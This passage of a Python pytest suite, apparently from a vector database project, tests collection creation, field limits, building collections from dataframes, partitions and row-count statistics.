check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_create_collection_maximum_fields(self):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num - 2
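# reserve two of the ct.max_field_num slots for the vector field and the primary key field appended after the loop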
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_over_maximum_fields(self):
"""
target: Test create collection with more than the maximum fields
method: create collection with more than the maximum field number
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_fields = []
limit_num = ct.max_field_num
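# ct.max_field_num scalar fields plus the vector and primary key fields appended below exceed the limit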
for i in range(limit_num):
int_field_name = cf.gen_unique_str("field_name")
field = cf.gen_int64_field(name=int_field_name)
int_fields.append(field)
int_fields.append(cf.gen_float_vec_field())
int_fields.append(cf.gen_int64_field(is_primary=True))
schema = cf.gen_collection_schema(fields=int_fields)
error = {ct.err_code: 1, ct.err_msg: "maximum field's number should be limited to 256"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
class TestCollectionOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test collection interface operations
******************************************************************
"""
# def teardown_method(self):
# if self.self.collection_wrap is not None and self.self.collection_wrap.collection is not None:
# self.self.collection_wrap.drop()
@pytest.mark.tags(CaseLabel.L2)
def test_collection_without_connection(self):
"""
target: test collection without connection
method: create collection after the connection is removed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.err_res, check_items=error)
assert self.collection_wrap.collection is None
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_create_drop(self):
"""
target: test cycle creation and deletion of multiple collections
method: in a loop, collections are created and deleted sequentially
expected: no exception
"""
self._connect()
c_num = 20
for _ in range(c_num):
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert c_name not in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_drop(self):
"""
target: test collection with dup name, and drop
method: 1. two dup name collection object
2. one object drop collection
expected: collection dropped
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
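# the first wrapper still holds a handle to the dropped collection, so its calls should now fail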
error = {ct.err_code: 1, ct.err_msg: f'HasPartition failed: can\'t find collection: {c_name}'}
collection_w.has_partition("p", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_after_drop(self):
"""
target: test create collection after create and drop
method: 1. create collection 2. drop it 3. re-create it with the same name
expected: no exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.drop()
assert not self.utility_wrap.has_collection(collection_w.name)[0]
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_all_datatype_fields(self):
"""
target: test create collection with all dataType fields
method: create collection with all dataType schema
expected: create successfully
"""
self._connect()
fields = []
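# build one scalar field per DataType member, skipping UNKNOWN and the vector types; a single float vector field is appended below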
for k, v in DataType.__members__.items():
if v and v != DataType.UNKNOWN and v != DataType.FLOAT_VECTOR and v != DataType.BINARY_VECTOR:
field, _ = self.field_schema_wrap.init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
fields.append(cf.gen_float_vec_field())
schema, _ = self.collection_schema_wrap.init_collection_schema(fields,
primary_field=ct.default_int64_field_name)
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_load_partition(self):
"""
target: test release the partition after load collection
method: load collection and load the partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
collection_w.load()
error = {ct.err_code: 1, ct.err_msg: f'load the partition after load collection is not supported'}
partition_w1.load(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_partition(self):
"""
target: test release the partition after load collection
method: load collection and release the partition
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
partition_w1 = self.init_partition_wrap(collection_w)
partition_w1.insert(cf.gen_default_list_data())
collection_w.load()
error = {ct.err_code: 1, ct.err_msg: f'releasing the partition after load collection is not supported'}
partition_w1.release(check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_release_collection(self):
"""
target: test release the collection after load collection
method: load collection and release the collection
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
collection_w.insert(cf.gen_default_list_data())
collection_w.load()
collection_w.release()
class TestCollectionDataframe(TestcaseBase):
"""
******************************************************************
The following cases are used to test construct_from_dataframe
******************************************************************
"""
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_df(self, request):
if request.param is None:
pytest.skip("skip None")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_dataframe(self):
"""
target: test collection with dataframe data
method: create collection and insert with dataframe
expected: collection num entities equal to nb
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([c_name])
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_construct_from_binary_dataframe(self):
"""
target: test binary collection with dataframe
method: create binary collection with dataframe
expected: collection num entities equal to nb
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_none_dataframe(self):
"""
target: test create collection from a None dataframe
method: pass None as the dataframe when constructing the collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_dataframe_only_column(self):
"""
target: test collection with dataframe only columns
method: dataframe only has columns
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_inconsistent_dataframe(self):
"""
target: test collection with data inconsistent
method: create and insert with inconsistent data
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
# one field different type df
mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
df = pd.DataFrame(data=mix_data, columns=list("ABC"))
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_non_dataframe(self, get_non_df):
"""
target: test create collection by invalid dataframe
method: non-dataframe type create collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
df = get_non_df
self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_data_type_dataframe(self):
"""
target: test collection with unsupported dataframe dtype
method: create from a dataframe that contains a datetime column
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_from_invalid_field_name(self):
"""
target: test collection with invalid field name
method: create with invalid field name dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_primary_field(self):
"""
target: test collection with none primary field
method: primary_field is None
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_not_existed_primary_field(self):
"""
target: test collection with not existed primary field
method: primary field not existed
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_construct_with_none_auto_id(self):
"""
target: test construct with auto_id=None
method: pass auto_id=None when constructing from dataframe
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and insert values
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(nb=100)
error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_true_no_insert(self):
"""
target: test construct with true auto_id
method: auto_id=True and do not insert ids (primary field values are all None)
expected: verify num entities
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
# df.drop(ct.default_int64_field_name, axis=1, inplace=True)
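# keep the primary key column but clear its values; with auto_id=True the ids are generated server side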
df[ct.default_int64_field_name] = None
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=True)
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_true(self):
"""
target: test construct with none value, auto_id
method: df primary field with none values, auto_id=True
expected: verify num entities and the auto-generated primary keys
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
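# overwrite the primary key column with NaN; with auto_id=True valid primary keys should still be generated (checked below)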
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=True)
mutation_res = res[1]
assert cf._check_primary_keys(mutation_res.primary_keys, 100)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false(self):
"""
target: test construct with false auto_id
method: auto_id=False, primary_field correct
expected: verify auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
auto_id=False)
assert not self.collection_wrap.schema.auto_id
assert self.collection_wrap.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_construct_none_value_auto_id_false(self):
"""
target: test construct with none value, auto_id
method: df primary field with none values, auto_id=False
expected: raise exception
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[:, 0] = numpy.NaN
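# with auto_id=False the NaN-filled primary column cannot be mapped to INT64, so construction is expected to fail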
error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_same_values(self):
"""
target: test construct with false auto_id and same value
method: auto_id=False, primary field same values
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
df.iloc[1:, 0] = 1
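# every row after the first shares primary key value 1; the insert is still accepted and num_entities counts all rows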
res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
collection_w = res[0]
assert collection_w.num_entities == nb
mutation_res = res[1]
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
@pytest.mark.tags(CaseLabel.L1)
def test_construct_auto_id_false_negative_values(self):
"""
target: test construct with negative values
method: auto_id=False, primary field values are negative
expected: verify num entities
"""
self._connect()
nb = 100
df = cf.gen_default_dataframe_data(nb)
new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
df[ct.default_int64_field_name] = new_values
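# negative int64 values are still valid primary keys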
self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
primary_field=ct.default_int64_field_name, auto_id=False)
assert self.collection_wrap.num_entities == nb
@pytest.mark.tags(CaseLabel.L1)
def test_construct_from_dataframe_dup_name(self):
"""
target: test collection with dup name and insert dataframe
method: create collection with dup name, none schema, dataframe
expected: both collection objects are correct
"""
conn = self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
df = cf.gen_default_dataframe_data(ct.default_nb)
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
conn.flush([collection_w.name])
assert collection_w.num_entities == ct.default_nb
assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_count_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.count_entities(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_vectors(self, connect, collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 0
class TestCollectionCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
request.param.update({"metric_type": "IP"})
return request.param
@pytest.mark.tags(CaseLabel.L1)
def test_collection_count_after_index_created(self, connect, collection, get_simple_index, insert_count):
"""
target: test count_entities, after index has been created
method: add vectors in db, and create index, then call count_entities with correct params
expected: count equals the number of entities just inserted
"""
entities = gen_entities(insert_count)
connect.insert(collection, entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
class TestCollectionCountBinary:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
request.param["metric_type"] = "HAMMING"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_substructure_index(self, request, connect):
request.param["metric_type"] = "SUBSTRUCTURE"
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_superstructure_index(self, request, connect):
request.param["metric_type"] = "SUPERSTRUCTURE"
return request.param
# TODO: need to update and enable
@pytest.mark.tags(CaseLabel.L1)
def test_collection_count_after_index_created_A(self, connect, binary_collection, get_hamming_index, insert_count):
"""
target: test count_entities, after index has been created
method: add vectors in db, and create index, then calling count_entities with correct params
expected: count_entities equals entities count just inserted
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
connect.flush([binary_collection])
# connect.load_collection(binary_collection)
connect.create_index(binary_collection, default_binary_vec_field_name, get_hamming_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_no_entities(self, connect, binary_collection):
"""
target: test collection rows_count is correct or not, if collection is empty
method: create collection and no vectors in it,
assert the value returned by count_entities method is equal to 0
expected: the count is equal to 0
"""
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == 0
class TestCollectionMultiCollections:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection_count_multi_collections_l2(self, connect, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
entities = gen_entities(insert_count)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_binary(self, connect, binary_collection, insert_count):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of mixed L2 and JACCARD types
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
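# first half of the collections use the default float-vector schema, the second half the binary schema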
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
log.info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: raise exception
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: raise exception
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: row count is 0
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test get_collection_stats without connection
method: calling get_collection_stats with correct params, with a disconnected instance
expected: get_collection_stats raises exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
log.info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
log.info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
log.info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
log.info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of vectors
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the collection count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
